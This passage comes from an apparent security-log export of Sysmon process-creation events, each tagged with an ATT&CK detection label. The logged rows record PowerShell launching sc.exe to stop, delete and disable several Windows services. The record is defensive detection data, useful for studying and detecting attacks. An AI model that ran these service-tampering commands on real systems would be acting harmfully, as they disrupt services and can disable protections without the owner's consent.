12:51:25.070"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-00107ef22a00}"",""processId"":""800"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.321",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.728 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010daef2a00} +ProcessId: 336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.733279200Z"",""eventRecordID"":""3135"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.728\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010daef2a00}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.728"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010daef2a00}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.279",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.693 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001023ee2a00} +ProcessId: 6188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WmdnPnSN 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.696553200Z"",""eventRecordID"":""3133"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.693\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001023ee2a00}\r\nProcessId: 6188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.693"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-001023ee2a00}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.267",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.662 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001019ed2a00} +ProcessId: 3908 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.671095400Z"",""eventRecordID"":""3132"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.662\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001019ed2a00}\r\nProcessId: 3908\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.662"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-001019ed2a00}"",""processId"":""3908"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.175",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:51:24.552 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00103fea2a00} +ProcessId: 1928 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.556137300Z"",""eventRecordID"":""3129"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.552\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00103fea2a00}\r\nProcessId: 1928\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.552"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-00103fea2a00}"",""processId"":""1928"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:19:53.150",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.443 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010d4e72a00} +ProcessId: 1520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.446558200Z"",""eventRecordID"":""3126"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.443\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010d4e72a00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: 
Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.443"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010d4e72a00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.082",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.417 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00100ce72a00} +ProcessId: 8176 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config sysmgt Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config sysmgt Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.422584900Z"",""eventRecordID"":""3125"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.417\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00100ce72a00}\r\nProcessId: 8176\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config sysmgt Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.417"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-00100ce72a00}"",""processId"":""8176"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
